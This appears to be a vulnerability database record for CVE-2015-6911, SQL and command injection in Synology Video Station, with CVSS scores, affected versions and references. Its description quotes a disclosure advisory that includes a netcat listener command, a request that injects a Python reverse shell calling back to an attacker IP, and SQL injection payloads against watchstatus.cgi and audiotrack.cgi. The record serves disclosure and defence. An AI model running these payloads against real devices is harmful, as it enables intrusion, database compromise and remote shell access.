Sign-up

ID

VAR-201509-0203


CVE

CVE-2015-6911


TITLE

Synology Video Station In SQL Injection vulnerability

Trust: 0.8

sources: JVNDB: JVNDB-2015-004688

DESCRIPTION

SQL injection vulnerability in Synology Video Station before 1.5-0763 allows remote attackers to execute arbitrary SQL commands via the id parameter to watchstatus.cgi. Synology Video Station is a video manager from Synology. As a result it is possible to compromise the PostgreSQL database server. ------------------------------------------------------------------------ Affected versions ------------------------------------------------------------------------ These issues affect Synology Video Station version up to and including version 1.5-0757. The script subtitle.cgi can also be called when the 'public share' option is enabled. With this option enabled, this issue can also be exploited by an unauthenticated remote attacker. This vulnerability can be used to compromise a Synology DiskStation NAS, including all data stored on the NAS, and the NAS as stepping stone to attack other systems. - Start netcat on attacker's system: nc -nvlp 80 - Submit the following request (change the IP - 192.168.1.20 - & port number - 80): GET /webapi/VideoStation/subtitle.cgi?id=193&api=SYNO.VideoStation.Subtitle&method=get&version=2&subtitle_id=%2Fvolume1%2Fvideo%2Fmr.robot.s01e10.720p.hdtv.x264-killers.nfo%2FMr.Robot.S01E10.720p.HDTV.x264-KILLERS.2aafa5c.eng.srt&subtitle_codepage=auto%26python%20-c%20'import%20socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((%22192.168.1.20%22,80));os.dup2(s.fileno(),0);%20os.dup2(s.fileno(),1);%20os.dup2(s.fileno(),2);p=subprocess.call(%5b%22/bin/sh%22,%22-i%22%5d);'%26&preview=false&sharing_id=kSiNy0Pp HTTP/1.1 Host: 192.168.1.13:5000 User-Agent: Mozilla/5.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate X-Requested-With: XMLHttpRequest Connection: keep-alive Pragma: no-cache Cache-Control: no-cache SQL injection vulnerability in watchstatus.cgi A (blind) SQL injection vulnerability exists in the watchstatus.cgi CGI script. As a result it is possible to compromise the PostgreSQL database server. In the following screenshot this issue is exploited using sqlmap. Proof of concept POST /webapi/VideoStation/watchstatus.cgi HTTP/1.1 Host: 192.168.1.13:5000 User-Agent: Mozilla/5.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate X-SYNO-TOKEN: Lq6mE9ANV2egU X-Requested-With: XMLHttpRequest Content-Type: application/x-www-form-urlencoded; charset=UTF-8 Content-Length: 80 Cookie: stay_login=0; id=Lq5QWGqg7Rnzc13A0LTN001710; jwplayer.volume=50 Connection: keep-alive Pragma: no-cache Cache-Control: no-cache id=15076178770%20or%204864%3d4864--%20&position=10.05&api=SYNO.VideoStation.WatchStatus&method=setinfo&version=1 It should be noted that the X-SYNO-TOKEN header provides protection against Cross-Site Request Forgery attacks. As of DSM version 5.2-5592 Update 3, this protection is enabled by default. As a result it is possible to compromise the PostgreSQL database server. Proof of concept POST /webapi/VideoStation/audiotrack.cgi HTTP/1.1 Content-Length: 294 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate X-SYNO-TOKEN: 7IKJdJMa8cutE Host: <hostname>:5000 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 User-Agent: Mozilla/5.0 Accept-Charset: ISO-8859-15,utf-8;q=0.7,*;q=0.7 Connection: close Pragma: no-cache Cache-Control: no-cache X-Requested-With: XMLHttpRequest Content-Type: application/x-www-form-urlencoded; charset=UTF-8 Cookie: stay_login=0; id=7IivlxDM9MFb213A0LTN001710 id=1%20AND%20%28SELECT%20%28CASE%20WHEN%20%28%28SELECT%20usesuper%3Dtrue%20FROM%20pg_user%20WHERE%20usename%3DCURRENT_USER%20OFFSET%200%20LIMIT%201%29%29%20THEN%20%28CHR%2849%29%29%20ELSE%20%28CHR%2848%29%29%20END%29%29%3D%28CHR%2849%29%29&api=SYNO.VideoStation.AudioTrack&method=list&version=1

Trust: 1.89

sources: NVD: CVE-2015-6911 // JVNDB: JVNDB-2015-004688 // VULHUB: VHN-84872 // VULMON: CVE-2015-6911 // PACKETSTORM: 133519

AFFECTED PRODUCTS

vendor:synologymodel:video stationscope:lteversion:1.5-0757

Trust: 1.0

vendor:synologymodel:video stationscope:ltversion:1.5-0763

Trust: 0.8

vendor:synologymodel:video stationscope:eqversion:1.5-0757

Trust: 0.6

sources: JVNDB: JVNDB-2015-004688 // CNNVD: CNNVD-201509-151 // NVD: CVE-2015-6911

CVSS

SEVERITY

CVSSV2

CVSSV3

nvd@nist.gov: CVE-2015-6911
value: HIGH

Trust: 1.0

NVD: CVE-2015-6911
value: HIGH

Trust: 0.8

CNNVD: CNNVD-201509-151
value: HIGH

Trust: 0.6

VULHUB: VHN-84872
value: HIGH

Trust: 0.1

VULMON: CVE-2015-6911
value: HIGH

Trust: 0.1

nvd@nist.gov: CVE-2015-6911
severity: HIGH
baseScore: 7.5
vectorString: AV:N/AC:L/AU:N/C:P/I:P/A:P
accessVector: NETWORK
accessComplexity: LOW
authentication: NONE
confidentialityImpact: PARTIAL
integrityImpact: PARTIAL
availabilityImpact: PARTIAL
exploitabilityScore: 10.0
impactScore: 6.4
acInsufInfo: NONE
obtainAllPrivilege: NONE
obtainUserPrivilege: NONE
obtainOtherPrivilege: NONE
userInteractionRequired: NONE
version: 2.0

Trust: 1.9

VULHUB: VHN-84872
severity: HIGH
baseScore: 7.5
vectorString: AV:N/AC:L/AU:N/C:P/I:P/A:P
accessVector: NETWORK
accessComplexity: LOW
authentication: NONE
confidentialityImpact: PARTIAL
integrityImpact: PARTIAL
availabilityImpact: PARTIAL
exploitabilityScore: 10.0
impactScore: 6.4
acInsufInfo: NONE
obtainAllPrivilege: NONE
obtainUserPrivilege: NONE
obtainOtherPrivilege: NONE
userInteractionRequired: NONE
version: 2.0

Trust: 0.1

sources: VULHUB: VHN-84872 // VULMON: CVE-2015-6911 // JVNDB: JVNDB-2015-004688 // CNNVD: CNNVD-201509-151 // NVD: CVE-2015-6911

PROBLEMTYPE DATA

problemtype:CWE-89

Trust: 1.9

sources: VULHUB: VHN-84872 // JVNDB: JVNDB-2015-004688 // NVD: CVE-2015-6911

THREAT TYPE

remote

Trust: 0.7

sources: PACKETSTORM: 133519 // CNNVD: CNNVD-201509-151

TYPE

sql injection

Trust: 0.7

sources: PACKETSTORM: 133519 // CNNVD: CNNVD-201509-151

CONFIGURATIONS

sources:
            
            
            JVNDB: JVNDB-2015-004688

EXPLOIT AVAILABILITY
sources:
            
            
            VULHUB: VHN-84872 // 
            
            
            
            VULMON: CVE-2015-6911

PATCH
title:Release Notes for Video Stationurl:https://www.synology.com/en-global/releaseNote/VideoStation?model=DS715
Trust: 0.8
sources:
            
            
            JVNDB: JVNDB-2015-004688

EXTERNAL IDS
db:NVDid:CVE-2015-6911
Trust: 2.6
db:PACKETSTORMid:133519
Trust: 1.9
db:JVNDBid:JVNDB-2015-004688
Trust: 0.8
db:CNNVDid:CNNVD-201509-151
Trust: 0.7
db:EXPLOIT-DBid:38128
Trust: 0.2
db:VULHUBid:VHN-84872
Trust: 0.1
db:VULMONid:CVE-2015-6911
Trust: 0.1
sources:
            
            
            VULHUB: VHN-84872 // 
            
            
            
            VULMON: CVE-2015-6911 // 
            
            
            
            JVNDB: JVNDB-2015-004688 // 
            
            
            
            PACKETSTORM: 133519 // 
            
            
            
            CNNVD: CNNVD-201509-151 // 
            
            
            
            NVD: CVE-2015-6911

REFERENCES
url:https://www.synology.com/en-global/releasenote/videostation?model=ds715
Trust: 1.8
url:http://seclists.org/fulldisclosure/2015/sep/31
Trust: 1.8
url:http://packetstormsecurity.com/files/133519/synology-video-station-1.5-0757-command-injection-sql-injection.html
Trust: 1.8
url:https://www.securify.nl/advisory/sfy20150810/synology_video_station_command_injection_and_multiple_sql_injection_vulnerabilities.html
Trust: 1.8
url:http://www.securityfocus.com/archive/1/536427/100/0/threaded
Trust: 1.2
url:http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2015-6911
Trust: 0.8
url:http://web.nvd.nist.gov/view/vuln/detail?vulnid=cve-2015-6911
Trust: 0.8
url:http://www.securityfocus.com/archive/1/archive/1/536427/100/0/threaded
Trust: 0.6
url:https://cwe.mitre.org/data/definitions/89.html
Trust: 0.1
url:https://nvd.nist.gov
Trust: 0.1
url:https://www.exploit-db.com/exploits/38128/
Trust: 0.1
sources:
            
            
            VULHUB: VHN-84872 // 
            
            
            
            VULMON: CVE-2015-6911 // 
            
            
            
            JVNDB: JVNDB-2015-004688 // 
            
            
            
            CNNVD: CNNVD-201509-151 // 
            
            
            
            NVD: CVE-2015-6911

CREDITS
Securify B.V., Han Sahin
Trust: 0.1
sources:
            
            
            PACKETSTORM: 133519

SOURCES
db:VULHUBid:VHN-84872
db:VULMONid:CVE-2015-6911
db:JVNDBid:JVNDB-2015-004688
db:PACKETSTORMid:133519
db:CNNVDid:CNNVD-201509-151
db:NVDid:CVE-2015-6911

LAST UPDATE DATE
2025-04-13T23:18:04.121000+00:00

SOURCES UPDATE DATE
db:VULHUBid:VHN-84872date:2018-10-09T00:00:00
db:VULMONid:CVE-2015-6911date:2018-10-09T00:00:00
db:JVNDBid:JVNDB-2015-004688date:2015-09-15T00:00:00
db:CNNVDid:CNNVD-201509-151date:2015-09-14T00:00:00
db:NVDid:CVE-2015-6911date:2025-04-12T10:46:40.837

SOURCES RELEASE DATE
db:VULHUBid:VHN-84872date:2015-09-11T00:00:00
db:VULMONid:CVE-2015-6911date:2015-09-11T00:00:00
db:JVNDBid:JVNDB-2015-004688date:2015-09-15T00:00:00
db:PACKETSTORMid:133519date:2015-09-10T00:05:25
db:CNNVDid:CNNVD-201509-151date:2015-09-14T00:00:00
db:NVDid:CVE-2015-6911date:2015-09-11T16:59:17.533